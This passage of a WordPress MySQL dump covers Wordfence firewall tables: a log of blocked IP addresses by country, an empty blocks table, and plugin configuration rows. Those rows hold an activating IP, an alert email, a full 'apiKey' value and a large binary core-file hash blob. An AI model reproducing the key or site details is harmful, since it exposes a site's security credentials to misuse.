0\0\0\0\0\0��X�\Z','DE',80,19371,'waf'),('\0\0\0\0\0\0\0\0\0\0��[)B�','DE',1,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0��[k��','IR',64,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0��[��j','BG',79,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��[�R$','DE',10,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��[�RS','DE',13,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��[�Rs','DE',29,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��[','GB',12,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��[��','GB',4,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��]��2','JE',1,19380,'waf'),('\0\0\0\0\0\0\0\0\0\0��_X��','DE',1,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0��b��','US',1,19380,'waf'),('\0\0\0\0\0\0\0\0\0\0��b��','US',1,19382,'waf'),('\0\0\0\0\0\0\0\0\0\0��e�q�','ID',2,19386,'waf'),('\0\0\0\0\0\0\0\0\0\0��gn�M','BD',2,19388,'waf'),('\0\0\0\0\0\0\0\0\0\0��g��3','PH',28,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0��h�+\n','US',9,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0��h�+\'','US',7,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0��ij`�','DZ',1,19380,'waf'),('\0\0\0\0\0\0\0\0\0\0��in','DZ',5,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0��k��','LU',4,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��l��','US',1,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0��m�S','FR',2,19370,'waf'),('\0\0\0\0\0\0\0\0\0\0��o��K','CN',1,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0��rY��','CN',1,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0��r_&�','CN',1,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0��t�w8','DE',4,19386,'waf'),('\0\0\0\0\0\0\0\0\0\0��t�w8','DE',11,19387,'waf'),('\0\0\0\0\0\0\0\0\0\0��{�/�','AU',1,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','DE',9,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','DE',7,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','DE',33,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','DE',2,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0����C�','BE',1,19383,'waf'),('\0\0\0\0\0\0\0\0\0\0�����U','SG',1,19371,'waf'),('\0\0\0\0\0\0\0\0\0\0���1X7','PH',1,19382,'waf'),('\0\0\0\0\0\0\0\0\0\0���\\�','FR',2,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0���/�:','BD',1,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0������','US',8,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0����y(','SA',5,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0���h!�','SG',4,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0����jY','DE',9,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','DE',71,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0���o��','EE',7,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0���o��','EE',7,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0����%0','UA',21,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0����%0','UA',1,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0����%0','UA',1,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0����%0','UA',1,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0����%0','UA',1,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0����%0','UA',1,19385,'waf'),('\0\0\0\0\0\0\0\0\0\0����%0','UA',2,19387,'waf'),('\0\0\0\0\0\0\0\0\0\0���+�','CH',1,19383,'waf'),('\0\0\0\0\0\0\0\0\0\0���+��','CH',1,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0���+�\Z','CH',1,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0���+�','CH',1,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0���+�#','CH',1,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0���+�#','CH',1,19382,'waf'),('\0\0\0\0\0\0\0\0\0\0���g�','KR',1,19383,'waf'),('\0\0\0\0\0\0\0\0\0\0���A��','NL',41,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0�����=','US',2,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0�����Q','US',9,19387,'waf'),('\0\0\0\0\0\0\0\0\0\0����eR','DE',1,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0���D$D','DE',1,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0����R\r','AD',1,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0���5u�','SG',4,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0���*!','US',1,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0������','DE',36,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0������','DE',26,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19360,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19369,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19370,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',2,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',2,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',2,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19383,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',2,19386,'waf'),('\0\0\0\0\0\0\0\0\0\0���&�','UA',1,19388,'waf'),('\0\0\0\0\0\0\0\0\0\0��©�\Z','US',62,19385,'waf'),('\0\0\0\0\0\0\0\0\0\0��©�\'','US',3,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��©�\'','US',6,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0����l','IT',1,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0���w��','MA',1,19383,'waf'),('\0\0\0\0\0\0\0\0\0\0���B&','SE',1,19383,'waf'),('\0\0\0\0\0\0\0\0\0\0��؃h','US',69,19370,'waf'),('\0\0\0\0\0\0\0\0\0\0��؃h','US',2,19370,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0����nt','DE',1,19383,'waf'),('\0\0\0\0\0\0\0\0\0\0���\r��','CN',1,19377,'waf'),('\0\0\0\0\0\0\0\0\0\0���\'�','KR',1,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0���w��','KR',1,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0���w��','KR',1,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0��܇x�','TW',1,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0��޽�','CN',1,19381,'waf');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblocks7`
--

DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=2019 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblocks7`
--

LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfconfig`
--

DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfconfig`
--

LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('activatingIP','185.175.113.72','yes'),('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','a:1:{i:1;i:1;}','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','asd@ads.com','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:2:{i:0;a:2:{s:9:\"timestamp\";i:1675307400;s:4:\"args\";a:1:{i:0;i:1675307400;}}i:1;a:2:{s:9:\"timestamp\";i:1675566600;s:4:\"args\";a:1:{i:0;i:1675566600;}}}','yes'),('apiDelayedUntil','1667050323','yes'),('apiKey','71be7a260c158d60d0ce2127e851fb7a7e5aad29b9106ad4e31142a2a1eb15df9d84ab5e10f255b4242e8a827d8656ef6d5d2a435ff9e35457f2407c1d3dce76537ad72ca54a42af369558729d3f45c7','yes'),('autoBlockScanners','1','yes'),('autoUpdate','1','yes'),('autoUpdateAttempts','0','yes'),('autoUpdateChoice','1','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1bb5b8b126','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0\Z��a:2:{s:4:\"hash\";s:64:\"8e7f7b1e0f269dee7cf4e7771b70e8d028948f1b8445284bb55fdd1cfdf22866\";s:6:\"hashes\";s:137728:\"\0���W7���ht#�	��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q�޹��\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q	ȐN��5��H�\0�9�w�i����5�������}���h��\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6��	�j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$�	�4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��ƒy�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{�����˜�5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p����pHa�P0�4��D�!�2�{�F�͹|���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u	re4�+JuP$,�WN��P�2�\"Ş�,|^��y޲���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_�	�Q�������oS�nn�̵v�\0)�������Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W:	�Sx�Dq5��/w��_W:��+f�1z��g���\\Y��m�x�GO0���jo].㖽�B�=�f~:N���Fa6�ա�\nY ���\'��i���+�`��fGYbm��UP��M��J�ڡ0�&Cv��M�$����O��4-K�	o6�lb�1E�;�7x�?�-�DZ��Z�zE���*�nk���E�m@������1s��Y�#1$��\Z�=I�����b��XBr�?���ͥ-�!�i�>�[��e�V{�W�!F�P�b<&„A����8�`��]wB�κ��@kp&���h4ԛ�2����f\'�G���IS��}�}R⥅�JЛZ[`�m��I�$=�����D��֛&�Ǿ@�+բ��qO.���x&��*p���@��l����Β/kz=�i���� S����\Z\Z4ڶ1�5���2�3\r#?E�Q���L��Im$�Z��B\Z�!��&�͖��Ck�`7���\'/��]�i��5�\0�����2SC���+2��f!Og�ve�C�h����%%��-��)^\\���\0�t`�k��@���U�OŔ�cp��>�!8HB6������=�b���!��n�z\0�OS~K��|$��T����lJ�b�Ow������f\nT����Eg\ZU�\r����l{��SYD7I�.`��Ï}#٧���JKN��e�ӌ��&��ЎuѡIq�t���n~T	_j��-����%��?�7�0i���}�e�iZ�O�&E+rX�e�{e��mX��<�:�KSy{��r�>K^s�VS2o�H֏�_��)7�����z_oe���ŭy�^/?h;@r�K%��LP��f��c�(|�_]��U�͒o~ME��������s��Rp�d��F[��\'r�5l���蔝媀���s��@Z2]��i���](J~n�3��ϝ�ـ�hj��q�o�2��kL��JQ�c\0�8|V��A�����Nں�)\r�m�MA���D��os,����$���gJ	�Ŗ�7l}�a�������w|�gRLh!���1�R�&\'��k�D\':8YިK�Aa�-�RH�T���������(:�=ߤ\'\\�\0���|�8�(��]x�Z���vJ+�~�S�$ً6��vg�Aќ�ʋQ?�j�`J��N�]�0&��b�\0�V?9�����\"�.�I3�2r)rk�+`�NiM��2]<�	�h\n�˥���O��3�5F���\\�\0���,vS��+p\n�.����\r�J*RT	�!��A&��U�B�tG=_:\\�]>i��?η@ڹ�aKպ�*��Խ+]���ҮgƉ^62�G��\r�S��|�;)�$=X�n!����l=�@�A����:�V56U�x5�Px���&�:V�V��-qX��A9�M�4��-����t\n{���}�MI	AE0N������.T0b([���������oYd��%� �+�[�B��� f�<3)|���y-�d�����]`,5��l9�o���x��;����xZ���q@���51a�Ix���MOY�U�\r�Z�t�Kϭ�uJOyŹ�&Ҹ��*�ܲ�us#��t1��#4����䂹\Z��\'&�8�\0������m9;:��ͼ�f��f�)���I�;��Poi���=�DᎯ�0Sl�hsgܺ{�,��)\Z|����<�\n�x��*����i����`��h��`�P��*ͤ�!j1m!�~�J��\r�O�]��Y<�y�}�\Z�>ɺH���I|��P�����Bb��e�^��Έ;VT1��cj�] k^�O��9�A9�/�\Z�%�@b�.�`�� po��df��?�jr��Y��e|�H��h>�,�ec���R�es5-���D=��<��:3��ϩ�M���>���r�6�Ԥ��%z�uۇ7�}�F���[yx��]k��ݭ�Yr����9�IV,C2�\"���V�l��p�]l2�P�f>�Kp��֚J���bvw�`���*�w��}����*ʘ��)>2�q��e��^�)�P����n�GfR�@Ol,>iv�:�`�tQ�*�8\'�<��\n����J���;�H`�Q؝6pq���a�%��\r��	��\"�A�n�3H�Is�:Y��a�e0BҲy�Pp\nﭾ�����!Λ���&��Ʌ\'M��4�B�S���+\'�4&�$ء��Vgg��o��g~��m/�/&t+���s�����\"#:Z�ܯ4㓉&_&���6\"xF�|w`AZ_+vL\r}��N�P���6������_��Ұ�ݾ��l2�b���qÜ$U�v��	l,s���\"\r�m��`��Yד�U��X^�Ms���6R�H@�	&�冾�B�x��@d�R#U��O�Pg��sH�o�)n��Wr��t�Z�M���?%���V���D��Fv�@�����*9V���μ�[E��Bu}<�\Z#�d�4*�?���d�Q]Bx.|9D��:h@��Q��/U\0-|_ۢ1�g-�+����}�Ԙ!^iB���J��\\W�]�f��@@�w�=	.]��kZ1љm�G���]�x�0���	14\"1�Ix��GL�[	���>(G�A:���	64���� �2DM�M�$�\r澐i�\0���	8\\Ŭ�j�A��ʔ5�+X���o�T�m�_|	M��yu$�1�ck_�K�o�f��m���%�	g)[.�r\n�o�i�{4��Q\n\r8H�\rfX��	v�l���ٮ�!��P��m���\n6|ϔK	~�C�ȫ��7���:��s&u����j��t	�+�{R���ل���n�t,�Ǟ�`���|U�	�	��#t�̹��p=�I\"����)F	֓���-�\nqU��i���-�$�h*��m�l	�Vh���LC��»>U�8.�`�@<K��h	�Ϳ��U%�O�Hޡ�@�~x\\6��~�\n<�:�X�h�QAT����o��p2���8>�\n*��<��ӳ�?HM��\'V���L�\'[R�\n�@&��[DqS�������B��N#F�B��\n*An���.]�B��t�v�!�WҧMw�9�F\n+P_tQ�Vo����7n�\nz#�8�����J\nGk��~ng��m.�3\\�\n��1i��jgָ�\nv�?�u�	���f�h6�2B���?�2\03�}�\nx��m���nV=OD��\0T���)��U��\n}.�����v�e�\n�?�.z��E����+ɡ\n��\\_9(�)7�\n��/�S��\'�g߃�v���\n�9d���g��~@���|�B-�����ڐ�6=��\n�T�[Cp����(,�_V+�L\rۨI��(.��\n�s�H��чc �-y//�?�\r�$M̤j3\n�aqYK�JҔ΀p�\ZJ�j��\\P���\n�\n��ڷ�tn�\r�Ean�J;}(��ҙ���.��9\n�X:��Q�}�+�O�\\�_�	{�ܓC\'a�y:��\n�� �W\"���w�\05�S Nr������h\n�C��0�pFd���l�\0��\"u�~2\"�T��p\Z\n�v�[\0���XZppi�.��c�;~&���\n���&�)h4�_`�F�L��<��:`#pf���\n����RW#ވ� �Q��ē4E[�\'�z�\r��)��k���O�dS0�X�z���_����61k��K(��]1�z�ukpR�!������YC8���`dfh�.^8����!{��F�N�L{��z�)��,�\"�w�W�S��JDz���K�S����uᾒ�M��cc���cdD�(�Q��\\�\ra�[�J?T���?��G�d��(s������t�BUI+u���C�����R����SF2>�3`��v��\'�:js(��-N���֠����N�3����:�VS;���CT\n��]���C�rJ�2����m5CZ�\0�/@@1�1�D�ծ6��8g\n)e���z��l�1�MH��&��S��.>�U�B|2��ӜOU}��(԰���z̹�=�䆀�0j2�4\n:��W�n����\\C2tc�2��ĒZV�R�顃[��l#4���>1ε��E���l|lh�����]���:�Yň�3	����\\gm̻�1)q+#���b�^0rR_Ҳ��Yn,��J�����́�T�NB�(�-��g��\\ICڞ�:r�n�̿�>Tw�D\n�Q�!�@iD��r��ȭ!wz��L{��J�y7-�m���G鴞Y�[����k��En#Xv�i�w�R��:�M�7K�kR��D����.�� L9��%�S���J*����n\'ͪt^���Vɹ�O�����*�(�����7Y��(V��z|%\0\'j����l���ص�$h�TC���՞N�8k�Ⱥ��y�*�<I\n����(���x�$���C\n��m�-B�����YVAlͼ2�VS�#n���X����6��X����DU�T�=��1O�@�,x�������� �)���\r�&�d5�s/,�\"�d��w22���\r��މ#<*Q�f��(�����\r%�P����cW�-:\'2�U�\'Ft�ݩz\r1?�;IB�=S��\Z�2֥͐�&�׆Z�B���\r5C�ٖ��N��s��k��l�\'t35����\rN��I�Y�����ԯ!���6)��I�Y\rQi�^�\ZB|��f��C���-/r��U�Y٢�B\rX�[cdpSs3�%.X��|A���w��#(JL\ra�{p�9����(A�)ˡ�̮SPV��s�6�#i\rnu���:Ft\Z��\"P9���qP���R��PA�\r���k�<vW�P�v��g(Hт��c�+d7\r�Y�t�W^���}rIxۯ�u��$�/dMk�\r�U��:�w����,���&�K�p&�\Z���\r�7Gٛ�r�Xyl�ﳠ<U5p8�n��\r›��Xd	D\n����q�bc�\Zu��\rٓ��C7,��<��p�,�L��~rY�s#�\r�\"�(qq�6�ZN��������ş&�h��\r�\n���*J��6������V^��%W\\�y�\'�h?I��I��3z(B�GQ#��`p�S:eJ�&�/�ʝ�aɋ��`�\n�}��\Z\\x�+�G\\%R���O��6���}�㕓悫�-�F�kRV��6���G_e\r��\"�}�Q^u�����YtY���sNl�dU|�7��t�U�FY���n�a�IWRH�j�wHBB����u�Xp\0b�Ue�$OrΰYe�JX�p�W	!��L�	o�Ѧ�?��11����]�Q[��7*�a�3�Ǿ�h��,�U���c�\\�ki����6u��J\n3*��Kv�i��A�&�4���=�D��q!蓸֧f;4��P�Z��e�O!�vx.e��8�jY�����0\Z����P�P1��S/���0�?�U!�͝�������6�??��Z��v�w=2H:�)x.���o\\��J��t�LU��o���L��~��)6�K�5S$ʂ8����⡧5g�g7�3lsuؾ�y���Z�wڠ�0YE\0����身i\\���|�����7��wq��;,r���L�X������\\35qv.R߼h<<���t�hD�$��\\1l$y�,��`p�M��j]#�W�B�Tm����F�M�(�b;ˏ�K���g�&\n�-��nzEja �#�[՝YdIdf@\\�K2o��؂/*�~�Hw�c@�2��,�����P�0������x`Ձ���dZvs�.��k�����\Z�5�\0��yX��$�j뤋��I��8���@t=��{9v��>:̷M\Z�ϵ����\rBt�\r�����3��i��0bn��j:�$L �g��r�a���������t��C �Y�\n��H���$$�T�̞}^�pfO]�ǭN3�%\r\\��-�A�J�K��K���7P�xe�\'�PH���H�P=,���L���N��}�\Z�E�O\\0�u��FOR\Z)ā���;S�\'bN<v�w�LSڻ�sT���|�>Q����i}�G�D���7��OF5�B�Nov���:A�_-3��x\ZJ�B�@k�y50���\n��Q�(��;�4�.���`R��w�|lS�Pp�k�G�M�8�����Թ��f�E�x;˝���O�[����J`uO�v&_���-]����E��;|��x$���(�t`\"���/\Z=�`>&�oR�֫��	�ڲ��}�Z	w�%��(�4)�;\r��;�)6qi9C��2��t�d64�Kծ�A�U)۳!���Pdlw�+���>�;��O��-L��hy��ML)\\VH��3_@AJ!�_��drN�d�G��;�Ϸ�6�<���wj�;�V��4dk�Է܏>�D��j�,p��k~*����d}�[����H�?�iK�[�i��/�(����^��\\���4��c-��Ȝ��)�͗�۷���@c.�V_;q���:uM���X���bW��Z`��E�ض\r�S��ky��%�/�-��u_EC�?o�Tg�NLC\"M�61ɿ�\\�)�j�i����]�m��b�#���6��C2���ao�2ᨁF���ˁL�W���%\rVJ~�p��$���P(��q��\0�RS�;\rs�}��o%��XOwR	�\\��B�;z����b#�q���l��E��S�WD��Lex��骴@m!��~���|d�ET9v,�Wы���ʀKK��#\0��f�羀G�~��p��oPq�9��\rbL\\9�2׬��n�*PP�\0A�w�:oH�RR�ES�G��ʏT-�a*Qf�,S�7��q��̓<�U*\";b�r���^�&��7j�Fő����ұy�ZA\"�Y�!�	=��x�`Jߩi.�?w~�/\"w�U{���Lf׏1:դy;�&ۆ޹[rD��b�Nv��㤄��\n�\Zwr��kHuE����N�/�JY���g�Si��)�N]o���}�0<��,���eS</�ܓ8C��T2I�UX�jF�\rPJ6�\\�d$Se=g�����۝JްS�0��il�ww�4�:����\"D�����=[��Z��\r���#�A@�f3�1_<���v����(QN��YCwo����}z�/�+x����\Z8��3�����ۀT�ё/��*�2^�oܰ�\n�0��\0��1�x?F(�8���V����/`8�І�Œ��t�2�:�]XK%�	EL��償�t�~�nF�^m���KY�N��\"�� �t�hR�D�P�>(�F-�$>Q���A*0l[U[����A7�E�OxƟ�:Y��{�� ��2g�Z��+j{�h���N�.m�۩+�6��r0���q��X�{4�a�����4����=P�Ҟ%^\\$��rf��z�;@h��謬&�f{��2�T��,Jg�~�KOb���H�$�(���\r_�\nt�l�	���6��Ax	�70)P;�\01���M{}i����E�ߍ\n�}HNf΍0/��,u��I������)�-[\0��=ֹ?�+;Q��/׬W/{����lDA��U��Rp�rmm\rF6��ط��i�(\":�@�c��:�<R)��%+:�����G%Cy*�m?۴�/�\r!����i�AHK2���w:�%.�;j@۴�)H&�R�װ���R��wci�F��z��\r_c;�QA���JR�Q6}���%�\0�w���Q1��h~�B��׺ʌ���ʤ!�g�y���{�8��٢��7\n��gT1��^0>�\r����劸֬+)��7X[_�u�۱H��]\"���¡`�nr�Xa�;�?~��R��q3��ٽ�R ���a�r\0��B<c�=OR��Š�v�B�n|J��In�;51V��SK��6ǐH��i�I�� (.fO��dx,�0Xl���J�.�*�Js�9��&�$����\rN�Z/�aU�Ə`�d�L�?�>C|����^v�s�_%�W���\rJ���*�f�zK�Hv��M,���,��z��㡫�?jk���[�0}��FW@�U0��W�gS��2c��FF�|�2`85�Sb�G?e?q7����#pjڥ|ɨ\0Y�����O|�aV3E�FW^@l�2�4K��<\\�/#\Z�����jp��!C��B��ڋTL�X�6�j��y�\Z\n�ё�4�W�\\\Z�T���M\\�V�dE��බ|@�]�)2ԕiq�j��\'�Vp�,�����K��zM�r#���6�h��q	:�@�߮�\r���0lҞ������6�j����Zm�c����-��k���Y���xJ��5����_�*���]O\\��s�M��\n�T��27���oڠC�g`c���˰m�upa�\\�|/J�y�2�fy2q�t�@W�k�mx�G���V͒�׵���pzk�訍�n!���>x�\\��h|�,�e�0?��s4n�,�Lmu��\Z�^΅hU}1}=�z��i��y\'\'|K��W?[�r(\r�\Z3���z�ػ�fW^P�1Y�2&��ۑpA�U���%�����f��G<�+HH4�ywy�\'hz�x�\"�v�\\�p�$��bo��)cH�vS��n_���(a��WcʹA���`k��BʜѮ,2���S��^ú�D��\Zѣ0?�ޖ�f�t��&�!-�U8��<��Gz�<3\0R�-k�,�u�׼)���\0��\n�9e\n!I9K�W���Ǽ?_�IaYOrg�Y����k?�R�0��}<�̤����.� ��$^$��m��w޻`.A�_[�rE��]�J�#��+ߘ�4�D���,E��ǡGf�y5ܟ@��nN��	�36�M���[�y�FRD�m��:�m�\\���,T�3y���?�P����Ԉ+o��Kqra��U�Wj�j�:M���S���C\0����E��pڎ�U=\\ف�2%����72B��9����9k���\r?r��qQe�-�=�������Ozγ�2z!���.�w���\ZFPA���SӃP��l�Z�N���!&��Qw�|�c;\0,2�aڢU��P��rY�o:W�3��\"6�uxh����S�ئ��3)]T�C��ˎ1B��\"$Ϥ_�Y[^�e\n��41��L��Hݩ�̨�<���W`��e���	�U�&�z�տR��B=P�Kq�F�u�~��\Z8�������W�2\0�	�e��`h��p�,��-n��}�;F��� \Z/q�@��Q!X�w>����7�.�l�8���le�Q,�������	n��a��TߌC�Ӏ#���������6�w�&��f�U�\n��`�Vr�{��YU��\"V1�	�]�98}�.�@�\rf[ɖ&����1^����gž+fV�`6)	�5��E��S�j������r�K����uj��%��p��A������9Xc<_:�l#�(�ǀv)ɣ�,��Ĺ��v�V-�n��z�W��E�2�D�����H�!~\\ꩠF�g�J\Zop\'�]Mi@����P;���VKi��V(�~n��&^VT�Sn���^��E��y	